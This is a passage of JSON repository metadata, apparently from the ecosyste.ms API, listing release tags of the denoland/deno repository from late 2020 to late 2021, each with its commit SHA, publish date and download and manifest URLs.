l":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std